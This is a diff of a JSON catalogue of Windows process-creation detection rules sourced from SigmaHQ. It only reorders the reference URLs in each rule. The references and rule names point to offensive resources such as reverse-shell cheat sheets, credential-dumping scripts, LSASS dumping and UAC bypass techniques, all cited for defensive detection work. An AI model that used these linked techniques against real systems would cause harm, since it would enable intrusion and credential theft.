+47191,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/_felamos/status/1179811992841797632", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/", + "https://twitter.com/_felamos/status/1179811992841797632", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devtoolslauncher.yml" ], "tags": [ @@ -47235,9 +47259,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini.yml" ], "tags": [ @@ -47319,8 +47343,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224", + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml" ], "tags": [ @@ -47465,8 +47489,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_proxy_exec_wmic.yml" ], "tags": [ @@ -47516,8 +47540,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/tccontre18/status/1480950986650832903", "https://twitter.com/mrd0x/status/1461041276514623491c19-ps", + "https://twitter.com/tccontre18/status/1480950986650832903", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml" ], "tags": [ @@ -47729,8 +47753,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", + "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml" ], "tags": [ @@ -47895,8 +47919,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_reflective_assembly_load.yml" ], "tags": [ @@ -47999,8 +48023,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bginfo.yml" ], "tags": [ @@ -48051,8 +48075,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", - "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml" ], "tags": [ @@ -48085,8 +48109,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://twitter.com/orange_8361/status/1518970259868626944", + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml" ], "tags": [ @@ -48111,11 +48135,11 @@ "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.joeware.net/freetools/tools/adfind/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://thedfirreport.com/2020/05/08/adfind-recon/", "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://www.joeware.net/freetools/tools/adfind/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml" ], "tags": [ @@ -48364,8 +48388,8 @@ "logsource.product": "windows", "refs": [ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", - "https://www.php.net/manual/en/features.commandline.php", "https://www.revshells.com/", + "https://www.php.net/manual/en/features.commandline.php", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml" ], "tags": [ @@ -48422,9 +48446,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ss64.com/bash/rar.html", - "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", + "https://ss64.com/bash/rar.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rar_flags.yml" ], "tags": [ @@ -48528,8 +48552,8 @@ "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", - "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml" ], "tags": [ @@ -48657,8 +48681,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml" ], "tags": [ @@ -48882,14 +48906,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://twitter.com/Hexacorn/status/776122138063409152", "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", "https://twitter.com/gN3mes1s/status/941315826107510784", "https://reaqta.com/2017/12/mavinject-microsoft-injector/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://github.com/SigmaHQ/sigma/issues/3742", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" ], "tags": [ @@ -49054,12 +49078,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", - "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml" ], "tags": [ @@ -49084,8 +49108,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/med0x2e/status/1520402518685200384", "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", + "https://twitter.com/med0x2e/status/1520402518685200384", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml" ], "tags": [ @@ -49119,8 +49143,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" ], "tags": [ @@ -49144,8 +49168,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", + "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" ], "tags": [ @@ -49269,8 +49293,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml" ], @@ -49329,9 +49353,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", + "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_firewall_disable.yml" ], "tags": [ @@ -49398,9 +49422,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fortiguard.com/threat-signal-report/4718?s=09", "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", + "https://www.fortiguard.com/threat-signal-report/4718?s=09", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml" ], "tags": [ @@ -49433,10 +49457,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", + "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", "https://github.com/defaultnamehere/cookie_crimes/", "https://github.com/wunderwuzzi23/firefox-cookiemonster", - "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", + "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml" ], "tags": [ @@ -49576,8 +49600,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml" ], "tags": [ @@ -49736,8 +49760,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", + "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml" ], "tags": [ @@ -49770,8 +49794,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml" ], "tags": [ @@ -49795,8 +49819,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" ], "tags": [ @@ -49853,9 +49877,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" ], "tags": [ @@ -49964,8 +49988,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html", + "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_dump.yml" ], @@ -50032,8 +50056,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4", "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0", + "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml" ], "tags": [ @@ -50296,10 +50320,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", - "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml" ], "tags": [ @@ -50350,11 +50374,11 @@ "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.joeware.net/freetools/tools/adfind/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://thedfirreport.com/2020/05/08/adfind-recon/", "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://www.joeware.net/freetools/tools/adfind/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_usage.yml" ], "tags": [ @@ -50397,11 +50421,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.alyac.co.kr/1901", + "https://en.wikipedia.org/wiki/Hangul_(word_processor)", "https://twitter.com/cyberwar_15/status/1187287262054076416", "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", - "https://en.wikipedia.org/wiki/Hangul_(word_processor)", + "https://blog.alyac.co.kr/1901", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" ], "tags": [ @@ -50602,9 +50626,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/nas_bench/status/1534957360032120833", "https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", - "https://twitter.com/nas_bench/status/1534957360032120833", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml" ], "tags": [ @@ -50737,8 +50761,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_service.yml" ], "tags": [ @@ -50771,8 +50795,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100", "https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/", + "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_fireball.yml" ], "tags": [ @@ -50806,8 +50830,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_workflow_compiler.yml" ], "tags": [ @@ -50849,8 +50873,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Oddvarmoe/status/985518877076541440", "https://lolbas-project.github.io/lolbas/Binaries/Print/", + "https://twitter.com/Oddvarmoe/status/985518877076541440", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_print.yml" ], "tags": [ @@ -51035,8 +51059,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/", "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", + "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml" ], "tags": [ @@ -51110,9 +51134,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.echotrail.io/insights/search/mshta.exe", "https://en.wikipedia.org/wiki/HTML_Application", "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", - "https://www.echotrail.io/insights/search/mshta.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml" ], "tags": [ @@ -51145,8 +51169,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", "https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ps_download_com_cradles.yml" ], "tags": "No established tags" @@ -51201,10 +51225,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/d1r4c/status/1279042657508081664", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", + "https://twitter.com/d1r4c/status/1279042657508081664", "https://curl.se/docs/manpage.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml" ], "tags": [ @@ -51530,9 +51554,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml" ], "tags": [ @@ -51557,9 +51581,9 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1211636381086339073", - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", - "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" ], "tags": [ @@ -51663,8 +51687,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/sensepost/impersonate", "https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/", + "https://github.com/sensepost/impersonate", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impersonate_tool.yml" ], "tags": [ @@ -51706,8 +51730,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml" ], "tags": [ @@ -51804,9 +51828,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://twitter.com/jonasLyk/status/1555914501802921984", - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml" ], "tags": [ @@ -51907,8 +51931,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Gal_B1t/status/1062971006078345217", "https://twitter.com/hexacorn/status/1448037865435320323", + "https://twitter.com/Gal_B1t/status/1062971006078345217", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml" ], "tags": [ @@ -52015,9 +52039,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", + "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", 